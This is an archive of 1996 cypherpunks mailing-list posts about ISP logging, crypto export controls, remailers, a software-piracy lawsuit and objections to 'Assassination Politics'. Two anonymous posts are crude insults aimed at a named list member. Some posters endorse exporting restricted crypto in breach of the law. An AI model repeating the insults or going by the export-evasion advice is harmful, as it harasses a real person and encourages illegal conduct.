#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 11 Oct 1996 14:02:30 -0700 (PDT)
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: "Forward Privacy" for ISPs and Customers
In-Reply-To: <v03007802ae819385a300@[207.167.93.63]>
Message-ID: <199610112201.QAA07959@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


In <v03007802ae819385a300@[207.167.93.63]>, on 10/09/96 
   at 10:13 AM, "Timothy C. May" <tcmay@got.net> said:

-.However, there are certain things my phone company does *not* do. They don't
-.keep _copies_ (recordings) of my phone conversations. 
-.
        true, so far

-.This means a court
-.order can't yield copies of past conversations.
-.
        true, so far

-.They also don't track
-.incoming phone calls to me. (I don't believe such records of incoming phone
-.calls are kept; maybe I'm wrong. Certainly with Caller ID, storing incoming
-.phone numbers is possible....I just don't think local or regional phone
-.companies care about such records, and hence don't bother to accumulate
-.them.)
-.
        Not true.  they *do* track incoming calls, including caller ID, etc
    even if blocked by the originating customer; even pay phones give
    out their ID which means if the callee is tapped, they have the caller's
    location in a flash by reverse reference. 

    Caller ID of blocked senders is available to anyone who wants to 
    read it.  the  "disable" bit can be programmed out of existence if
    anti-privacy snooping is your business ( you can modify software 
    and/or firmware in most of the the WinTel hardware platform 
    add-ons for phones to do so).

-.Now, should the phone company keep such records, they would be accessible via
-.court order.
-.
        Sure are; and they are there.

-.My point? ISPs are currently in a position to turn over *far* more
-.information than phone companies are able to turn over. It's as if the phone
-.companies kept audio recordings of all conversations, without even the need
-.for law enforcement to do a wiretap or pen register or whatnot. It would be
-.trivial for law enforcement to say: "Phone Company, here's a subpoena/court
-.order for the last 6 months of phone conversations Tim May has had. Please
-.ship the tapes via FedEx."
-.
        exactly;  recording of calls is not done without a court order
    --or an LEO operative having a buddy or bribee in the switch room.

        besides, LEOs do not wiretap suspects without a court order 
    (really)  --but they *do* just happen to talk loud enough in certain
    places about wanting that information (including inbound CallerID),
    that whatever information is desired is handed over by a snitch for
    the usual 30 shekals, or more.

-.This makes the ISP case a bit different. Not legally, but technologically.
-.
        Unfortunately, the same "problem" applies here --the ISPs can be
    ordered to keep logs of mail traffic.  So far, the fact this is not 
    current Fed policy is what permits our remailer networks to 
    operate at all.  If remailers were required to keep logs --of what
    value would remailers be?

        Obviously, this not mean that some brain-dead Fed, Jamie Gorelick
    for example, will not ask Congress to attach a rider to some other bill
    which will pass with high numbers  --remember the "manager's mark"
    which added the CDA provisions we object to after the House voted
    410-2 for no-CDA?

-.There are some fixes.
-.
        valid only until the Feds order ISPs to log, and to whatever level.

-. [snip]
-.(Recall that Ollie North thought he had deleted his incriminating White House
-.PROFS messsages, but that they were faithfully preserved on backup tapes, and
-.could be retrieved.)
-.
        sure makes a good argument for ZIP drives does it not?

            --of course, supposing PRZ did not sell out to get off,  
    the messages should have started our with PGP --you can always
    lose a keyring <g>  

        or, have a second internal file which is non-incriminating 
    which pops up with the dummy key --talks about your kids or 
    whatever.  that and pray your recipient gets the decoded message
    off his disks pronto.  would not take much to modify PGP to be
    two (or split) keyed.  of course, we might as well shift over to
    the newer lattice crypto theories and up the price to play.

        or, interleaving which is a particularly nasty means of playing
    the game  -it gets their attention real fast;  been there and seen
    the two grey suits at the door at 5 am a few times --unpleasant
    men.

        or, as I do with all mail, despite the small fraction I consider 
    sensitive:   all inbound mail goes to a ZIP disk --decoding, 
    including tmp files, is on the ZIP --I may even switch to JAZ and
    keep the archives on optical (which is also a lot faster).

-.[snip...] 
-.(* Prepaid phone cards, paid for in cash, and payphones, tell us that True
-.Names are not needed with the phone companies. And so on.)

        so far, this is one of the few freebies we have, but is it a
    freebie long? 

        with the new digital wiretap provisions and sophisticated 
    speech reconition, the Feds can scan and monitor active payphones
    and still have their cake after they have eaten your rights.

-.We don't have to make it easy for them.
-.
-.--Tim May
-.
        how?  revolution per the Thomas Jefferson rationalization?

        nor must "they" make it easy for us.  <g>
--
  I'll get a life when it is proven
    and substantiated to be better
      than what I am currently experiencing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Sat, 12 Oct 1996 00:53:25 -0700 (PDT)
To: jimbell@pacifier.com
Subject: exporting signatures only/CAPI (was Re: Why not PGP?)
In-Reply-To: <199610111648.JAA20799@mail.pacifier.com>
Message-ID: <199610112013.VAA00503@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Bell <jimbell@pacifier.com> writes:
> At 08:49 AM 10/11/96 +0100, Adam Back wrote:
> >  [...].  Microsoft's CAPI arrangement is that they will not
> >  sign non-US CAPI compliant crypto modules (Examples of enforcement of
> >  no-hooks interpretation).
> 
> Does that fix the "export only the signature" problem (for the 
> government)/opportunity (for the rest of us)?   You know, present Microsoft 
> with the software, don't tell them it's already out of the US, and they sign 
> it.  Export the signature only  (who cares if this is legal!) and edit the 
> international software to contain the signature.

Export the lot, signature included :-)

(I doubt exporting only the signature once the story came out would
offer you any more protection legally than exporting the software).

As you say who cares if it's illegal: things get exported all the
time.

The problem however, is finding a non-US site to hold the hot potato
once it has been exported.  For example 128 bit Netscape beta was
exported a while ago.  I don't see it on any non-US sites.  This is
due to Netscape's licensing requirements, you need a license to be a
netscape distribution site, the license doesn't include the right to
mirror non-exportable versions on non-US sites.

If the exported software is `PGP3.0 for CAPI' or whatever, I think it
should be fair to conclude it will be cheerfully mirrored by all, and
Phil Zimmermann won't be complaining.  (PGPfone is on ftp.ox.ac.uk,
plus other places, for example.)  So yes, I agree, for software with
appropriate distribution licenses.

Another approach, which has been discussed lately is the use of a
patch to usurp Microsoft as the signatory for CAPI modules.  I wonder
what Microsoft would say about an unauthorised patch, to fix an ITAR
induced `bug' in windows.  Bill Gates doesn't sound pro-GAK.  If they
aren't going to complain, perhaps such patches could be distributed
widely outside the US also.

The new owner of the CAPI signatory key would need a good reputation,
and presumably a policy of signing any (non-GAKked) CAPI modules
signed by microsoft, and anything else that anyone wants signed.

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 11 Oct 1996 21:29:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Constitutional Convention
Message-ID: <v02130501ae846cd7c1ca@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


Have any on the list been following ballot measures aimed at term limits?
In Nevada, one of (I believe 45 states) with such initiatives on the
November ballot, the measure seeks to limit some state offices and requires
the state to call for a Consititutional Convention to limit terms of
Federal Senators and Reps.

If these pass we could be in for some wild times as every disaffected group
(e.g., pro-life) seeks to codify new Amendments in agreement with their pet
cause.




PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 11 Oct 1996 21:40:51 -0700 (PDT)
To: John Fricker <jfricker@vertexgroup.com>
Subject: Re: Burma bans modems
Message-ID: <v02130502ae846e4e19c7@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>    UPI reports that in July a diplomat, Leo Nichols, died in prison
>    after he was sentenced to a lengthy term for illegal possession of
>    fax machines.
>
>    It's clear from this action that the SLORC, i.e. the "State Law and
>    Order Restoration Committee" (sic!) understands full well the
>    benefits and importance of the Internet and other forms of
>    electronic communication to open societies, and is determined to
>    deny these benefits to its citizens.  Given its recent history and
>    the quasi-imprisonment of Daw Aung San Suu Kyi, this new action is
>    perfectly consistent with the government's previous abysmal
>    record.
>

Look, look, up in the sky!  Its a B2, not its an F-117, no it AP-man!

The Great Mandala is in motion. Ladies and gentleman place your bets.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   |
Sacred Cow Meat Co.       |
---------------------------------------------------------------------

Counter-cultural technology development our specialty.

Vote Libertarian.

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 11 Oct 1996 21:25:35 -0700 (PDT)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Clinternet?
In-Reply-To: <v03007818ae841f37f6e6@[206.119.69.46]>
Message-ID: <Pine.BSF.3.91.961011222435.17326B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 11 Oct 1996, Robert Hettinga wrote:

> Hoo boy.
> 
> I had the most amazing whiff of paranoia from the morning news.
> 
> Clinton wants to buy the internet back for $500 million so he can watch us
> better?
> 

With just one small ISP going on the public block for about 50 Million 
next Wed., he better get out a much bigger checkbook ... :)

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 11 Oct 1996 21:27:11 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Margaret Milner Richardson loses her breakfast...
In-Reply-To: <v03007802ae79fed8a057@[206.119.69.46]>
Message-ID: <v03007811ae84b06db143@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:01 pm -0400 10/11/96, Ray Arachelian wrote:

> Shh, be vewy vewy quiet, I've got a guy subscribing to my filtered list
> from the IRS. :)  (I'm not forwarding tax evasion stuff since it's not
> cpunx related, but still...)

Ah. Somehow, this reminds me of an old Warner Brothers' cartoon spoof of
Wagnerian opera, with Bugs as Brunhilde, and Elmer sproinging along behind
singing "Kill the Wabbit, Kill the Wabbit, ..." etc., to the tune of "The
Ride of the Valkyries".

If you do a "who cypherpunks" to majordomo@toad.com, you see all sorts of
fun addresses. (Hi, Elvis!) Hell, I've got feds and spooks all over e$pam,
my filtered *super*set of cypherpunks and a bunch of other e$ lists, and
that's to just 200 folks or so. Also, if you think cypherpunks is a
firehose, you should see e$pam. I'm probably the only filter of cypherpunks
that is actually *bigger*. ("It don't say 'e$pam' until Bob says it says
'e$pam'"). Kawika Daguio of the ABA tells me he has his secretary print it
out every morning and put it in a *binder* so he can read it.

Hell, I zinged that Maggy Ric^h^h^hhards^hon breakfast puppy right out
there to e$pam *first*, before it went to cypherpunks, even.


More fun with numbers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 11 Oct 1996 21:28:17 -0700 (PDT)
To: gbroiles@netbox.com (Greg Broiles)
Subject: Re: SPA sues C2, other ISPs and users
In-Reply-To: <3.0b28.32.19961011141214.006e8aec@ricochet.net>
Message-ID: <199610120402.XAA18045@homeport.org>
MIME-Version: 1.0
Content-Type: text


I prefer to offer shows of support in the forms of a donation to a
legal defense fund.  That way, I'm clearly supporting the
organization, not becoming a customer.

Sameer, if this gets pricey, please establish such a fund, and let us
all know about it.

Adam


Greg Broiles wrote:

| According to a 10/10/96 press release, the Software Publishers Association
| has files copyright infringement suits against three ISP's and two
| individual users. The three ISP's were Community Connexion of Oakland,

| It's inappropriate to expect Sameer or any other C2
| employee/agent/representative to discuss the suit before they've had a
| chance to find and meet with an attorney; in some circumstances it might
| never be prudent for them to make a public statement about the suit. But it
| certainly couldn't hurt for people who've thought about signing up with C2
| to do so now as a show of support, nor for existing users to renew their
| service early.

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 11 Oct 1996 21:26:37 -0700 (PDT)
To: roy@scytale.com
Subject: Re: "Drift net fishing," GAK, FBI, and NSA
In-Reply-To: <961011.070615.2E8.rnr.w165w@sendai.scytale.com>
Message-ID: <Pine.SUN.3.91.961011230650.17099D-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 11 Oct 1996, Roy M. Silvernail wrote:

> No sign, no warning.  If I hadn't been on a tight business schedule, I'd
> have walked out.

My company uses debit cards, they're not marked that way at all, and look 
100% like credit cards.  We get'em from Merryl Lynch.  See if you can get 
your bank to issue one without the tags.

=============================================================================
 + ^ + |  Ray Arachelian    |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | "A toast to Odin,  |KA| law abridging the freedom of speech'|==\|/==
 + v + |  God of pretzles!" |AK|        do you not understand?       |=======
===================http://www.brainlink.COM/~sunder/=========================
           ActiveX! ActiveX! Format Hard drive? Just say yes!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Compton <kpieckie@Harding.edu>
Date: Fri, 11 Oct 1996 21:51:36 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
In-Reply-To: <v03007833ae843c15bf0b@[206.119.69.46]>
Message-ID: <Pine.SOL.3.94.961011230315.21141A-100000@taz>
MIME-Version: 1.0
Content-Type: text/plain



Due to the high volume of mail from this list, I rarely get to read every
message that comes through here.  Thus, I ask a reply be sent to
kpieckie@harding.edu directly rather than through the list.

Please forgive the interruption if this message is slightly off-topic.

The library here at Harding University is attempting to set up some
internet computers that run Netscape only and do not allow access to
anything else on the computers.  We use a scripting program called Flute
that hides the Program Manager (WFW 3.11) and reloads Netscape when it is
nuked with Alt-F4.  Another program removes the ability to use any of the
netscape pulldown menus less help.

The problem is the keyboard.  If a user hit's Alt-F4 after Progman has
loaded but before the Flute script executes, Flute is terminated and the
user has access to the computer.  Are there any programs that will disable
Alt-F4 and Control-Esc in Windows?  Where can they be attained?  Freeware
is preferable, shareware is fine, trial period is required for commercial
products.  Thanks.

Kevin
kpieckie@harding.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Fri, 11 Oct 1996 23:14:14 -0700 (PDT)
To: "(Rollo Silver)" <jimbell@pacifier.com>
Subject: Re: Why not PGP?
Message-ID: <19961012061308687.AAA242@GIGANTE>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 10 Oct 1996 13:40:31 -0800, jim bell wrote:

>>I don't intend to submit my present or future private PGP keys for key
>>escrow (Is that what's called GAK?). To protect myself against forgetting
>>my private key (which has happened once already) I'll no doubt some day put
>>it on a floppy and put the floppy in my bank safe deposit box.

>You still have to "remember" that long, non-memorizable key, although 
>something like that can be written on paper and well-hidden and/or split up 
>into parts.  It's only value is to decrypt that bank-stored floppy.

It'd be only 256 bytes or 512 hex digits.  If it was *that* important, you
_could_ memorize it!  After all, some monks memorized the entire Bible.  I
knew guys who had pi memorized to over 300 places....



#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf Moeller)
Date: Fri, 11 Oct 1996 15:35:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Crypto AG - Secret GAK Partner ?
In-Reply-To: <325CDEE2.86A%pc.jaring.my%ulf.cypherpunks%autopost@ulf.mali.sub.org>
Message-ID: <m0vBq9H-0003blC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain



>> Some one recently gave me a copy of an article in Der Spiegel
>> (unfortunately in german!) stating that Crypto AG of Switzerland
>> had passed the keys to the German Govt without informing the
>> customer.
>
>This is nothing new. But how about faxing the article to John Young, so 
>we all may benefit?

There is no need to. They have an archive at http://www.spiegel.de/archiv/
(you have to register before you can use it). The article was in
Der Spiegel 36/1996.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Fri, 11 Oct 1996 23:39:32 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: SPA sues C2, other ISPs and users
In-Reply-To: <3.0b28.32.19961011141214.006e8aec@ricochet.net>
Message-ID: <m2919clm3t.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Greg" == Greg Broiles <gbroiles@netbox.com> writes:

Greg> Particularly interesting is that they seem to be claiming that a
Greg> *link* to a pirate FTP site is itself infringing (potentially
Greg> contributory infringement).

Yes, at first reading it also seems to forbid things like
``warez.diamond-lane.net''.

I hate being threatened, even if the suggested course of action is one
I do anyway.  I also see the piracy ``problem'' as one of economics.
If their software was really worth what they were trying to charge,
there wouldn't be so much theft of it.

Both sides are scum and it's sad to see people like Sameer caught in
the middle.
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be billed at $250/message.
What are the last two letters of "doesn't" and "can't"?
Coincidence?  I think not.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Fri, 11 Oct 1996 21:50:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [RANT] Re: Why not PGP?
Message-ID: <199610120450.AAA53576@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: apteryx@super.zippo.com, cypherpunks@toad.com
Date: Sat Oct 12 00:48:23 1996
Mark wrote:

<snip>

> Does this mean that exporting Private Idaho, PGPfront, WinPGP, etc.
>  would
> be a violation of ITAR because they function only when combined with PGP
> and contain "hooks" for using PGP?

To the best of my understanding, "maybe, it depends" A lousy answer to a 
good question, and NOT legal advice of course.

One of the big problems with regs. like ITAR (and others of questionable 
Constitutionality) is uncertainty. Certainty and simplicity would lead to 
less FUD, and hence less power on the part of regulators, so it's not in 
their interest to be definite or even rational. One of the things "it 
depends" on may be the time-proximity of an election, of course. Folks seem 
to have disturbingly short memories regarding governmental abuse these days.

> I don't recall any restrictions on who could download these files from
> their host sites.

At least in the case of Private Idaho, which seems to be the standard for 
using & chaining remailers (with John Doe in a close second place) there 
seems to be no restriction. AFAIK, Joelm couldn't keep a program as nice and 
as widespread and as popular from getting exported no matter what he did. 
Joey Grasty tried (really!) to keep WinSock from getting exported, but it 
was overseas anyway, within days. [I didn't do it.]

Is remailer software somehow different than remailer-using software under 
ITAR? Again, I don't know. <sigh>

It is quite likely, IMO, that the next governmental attack on privacy will 
come on the chained, encrypted remailers, like WinSock, which I'm running as 
I type now. :) I am a strong believer in privacy, but only for peaceful and 
good purposes. Running a remailer, like running for office, is an experience 
that will change your outlook on things. I encourage doing both.

As everyone knows, I would be likely to begin keeping logs and cooperate 
with law-enforcement (even the lying, "evidence" planting, biased assholes 
at B.A.T.F.) if I were to somehow discover violent abuse, like Mr. Bell's 
"assassination politics" scheme, going on inside WinSock. Presently, only a 
rejected message file is kept. With proper encryption and chaining, I am not 
sure how much good cooperation would do anyway, and I would be certain to 
take considerable pains to avoid compromising the privacy of legitimate 
users.

OTOH, I would shut down, or go to jail for contempt, or both, rather than 
cooperate even one little bit in the enforcement of the failed, corrupting, 
tax-and-spend drugwar. I am sure that different remailer-operators all feel 
differently about the issue, and it is certainly a touchy one, but I am sure 
that some operators do agree with me. I will not initiate, or advocate, or 
abet violence in a failed attempt to achieve political or social goals, no 
matter who or what wants me to.

I hope that abusers don't "ruin it for the rest of us." I would also hope 
(though it sometimes seems that no rational argument stands a chance) that 
those who are tempted by violent, simpleminded "solutions" would understand 
from recent and not-so-recent history that transforming jerks into martyrs 
is an incredibly simple way of cementing those jerks' policies *permanently* 
into law. There is no free political lunch -- peaceful change requires hard 
work and money.
JMR


One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:jmr@shopmiami.com> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMl8jHG1lp8bpvW01AQFWnwP+MhhHkTt9f3GbkjPlf+w7aZuzPMEt5xEi
vMDSiu5cHjXeCFKZgVlb/8jXfin7hiGjoEEeeq0ntIb0POTKfbFUI/EB3nURrj8u
aABvshBGVOfLNJzO/+6nqAgJeVMgyhjJYBkjWSvuJDHhphCfUtpyLKkvI3V8Ps4k
h8ZHM2t95q8=
=K6Lo
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 12 Oct 1996 15:10:35 -0700 (PDT)
To: adam@homeport.org (Adam Shostack)
Subject: Re: SPA sues C2, other ISPs and users
Message-ID: <199610122209.PAA13043@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:15 PM 10/12/96 -0700, sameer@c2.net wrote:
> We'll be doing a press release
> for monday.

I look forward to supporting the ISPs in whatever 
manner seems most likely to be effective.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 11 Oct 1996 18:45:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [ADMINISTRATIVIUM] Blowfish
Message-ID: <199610120145.DAA03602@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Many forgeries are traceable with mathematical 
certainty to feebleminded Timothy C[rook] Maya's 
poison keyboard.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 11 Oct 1996 21:54:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: is there no end to AP & Creative Wiretap Arguments?
In-Reply-To: <Pine.SUN.3.94.961009010443.4662E-100000@polaris>
Message-ID: <199610120553.XAA19208@infowest.com>
MIME-Version: 1.0
Content-Type: text/plain


        after months of patient explanations to Jim Bell and 
    sympathizers, going over the same points in 31 flavours,
    the same arguments of what I would call "respectable" anarchy 
    (well stated by Tim May) rather than the "world at war" anarchy of 
    Jim Bell --  where are we?!?

        I read Jim's first "manifesto" at least 18 months ago; and, the
    "refined manifsto" less than a month ago.  I have yet to see an 
    application of civilization which brings AP society up to even the 
    level of Tombstone AZ just prior to the OK Corral.

        Jim's theories all hinge on betting pools which supposedly can
    be run like the lottery where the poor can share a ticket 
    (egalitarian, of course), anonyminity (which as an argument is 
    appropriate, but what for in a selfish immoral act?),  and a 
    justice is served attitude, even if there are mistakes.

        the whole concept of AP does not even support the concept of
    "justice is expeditiously served!"   it is a resort to the manners
    of dogs and monkeys sitting at the same table --a spiteful, 
    arrogant player can move the betting pools to assassinate anyone.

        In other words, are we planning to use James Caan as the lead
    runner in "Roller Ball"  --except this time we're playing with a 
    "live" society for which we hold in common the utmost contempt?  

        are we trying to return to the bread and circus mentality of 
    Rome on its deathbed and slide to subjecation by Attila the Hun 
    who was actually stopped from sacking Rome after the Pope so 
    impressed him with his regal robes....  deciding  tribute from an 
    established dictatorship was more reliable?  --and less costly?!?

        has anyone seen a single social moral fiber in Jim's often 
    passionate arguments for AP, or even in the "results" in a society
    which will never breed another leader: religious, secular, or even
    political?  

        does AP permit anything except slaves and drones which can 
    just as easily be replaced by robots?  maybe noone will miss news
    reports (as 'canned' as they are), or movies which entertain or 
    provoke?  or ice cream sundaes at the soda fountain?

        ...and the disappearance of grocers, and doctors, and dentists
    bringing forth a new age of subsistence farming and hunting for 
    the lucky few who might live to a readjusted live expectancy point
    of 30 yrs, burning books and computer printouts for cooking and 
    warmth.

        why have books or knowledge when there is noone willing to
    accept the responsibility of educating your children, the instructor
    waiting for the parent of Dumb Suzy to avenge her failing grade?  
    after all, Suzy does not need to read, not even well enough to 
    take the test for a driver's license --there is no infrastructure;
    no need to learn math well enough to possibly balance a checkbook
    --after all, there are no banks...

        well, killing for my country was once my civic duty;  I never 
    killed in revenge --there was no need, we never left enough living
    for them to attempt their revenge.  

        was it desensitizing, yes.  killing is just another days work...

        would I even consider doing it again for our "proud and just" 
    republic?  what "proud and just" republic? it has not even had
    the resemblence of a republic, let alone "proud and just" since
    Stanton and his crony Cotton arranged the assassination of
    Lincoln --it only cost Cotton $50,000.  

        sacrificing 55,000 men and frying the brains of another
    1.5 million solely to fatten the industrial war machine?   using
    John Foster Dulles' "domino theory" to justify the carnage... 

        to bad I was still of an era which said 'you will serve if called'
    and so stupid to take almost six years to get out.  Would you 
    serve a country today which is rotten to the core?

        "Assassination Politics" is nothing more than a childish game
    which 'legalizes' killing anyone you wish.  are AP's proponents so 
    naive they believe the bookies will not have any public person 
    assassinated by rigging the pools for their own profit?  remember,
    law enforcement ceased with the return of 'law of the jungle' 
    anarchy.  

        AP has already decided the people are free to return to the 
    savage jungle where the big cats hunt for food, and man hunts for
    pleasure.

        Jim Bell has amused us long enough --an average of 10-15
    messages a day; every thread being convoluted to included the
    aspects of Assassination Politics  --the all encompassing AP.

        PURE CRAP!

        arguing AP in any form is just another case of mental 
    masturbation, and the old story still applies:  

            "if you are arguing with a fool; 
                look in the mirror before you continue!"

        or as brock says:

                attila out....
--
  What part of 'Congress shall make no law 
    abridging the freedom of speech'
    do you not [oops... sorry] do you understand? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 11 Oct 1996 23:14:06 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [URGENT] Secure envelopes
Message-ID: <199610120614.IAA23668@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


There's a rumor that Timmy C. Mayflower sells his dead relatives as 
fertilizer as they constitute the best shit in California.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 12 Oct 1996 06:03:09 -0700 (PDT)
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Clinternet?
In-Reply-To: <v03007818ae841f37f6e6@[206.119.69.46]>
Message-ID: <v03007803ae854206bf9b@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:25 pm -0400 10/11/96, Rabid Wombat wrote:

> With just one small ISP going on the public block for about 50 Million
> next Wed., he better get out a much bigger checkbook ... :)

Ah. I feel much better. How soon I forget my own preaching.

In a geodesic network, a single node (or entity) can't switch all the
traffic. If it does, it chokes. It becomes damage, to paraphrase Gilmore,
and the internet routes around it.

So, Mr. Clinton, come on in, the water's fine. Just don't expect to own the
pool just because of your, er, heavy displacement...



Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Allyn 206-860-9454 <allyn@allyn.com>
Date: Sat, 12 Oct 1996 08:52:11 -0700 (PDT)
To: kpieckie@Harding.edu (Compton)
Subject: Re: your mail
In-Reply-To: <Pine.SOL.3.94.961011230315.21141A-100000@taz>
Message-ID: <199610121556.IAA25756@mark.allyn.com>
MIME-Version: 1.0
Content-Type: text/plain


In controlling use of PC's and disabling re-booting - -

I think you can disable the control alt delete stuff in Linux. Besides,
Linux can be set up far more secure than Windows. 

Put Linux in the hard drives of the machines; remove the floppy drives;
disable the reset buttun; put a lockable cover plate over the power switch
and the power cord entry; put a lockable clamp over the power plug at
the wall socket; and lock the computer down onto the table.

Mark Allyn
allyn@allyn.com 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Sat, 12 Oct 1996 09:07:50 -0700 (PDT)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
Message-ID: <v02130502ae850fb9a80c@[10.0.2.15]>
MIME-Version: 1.0
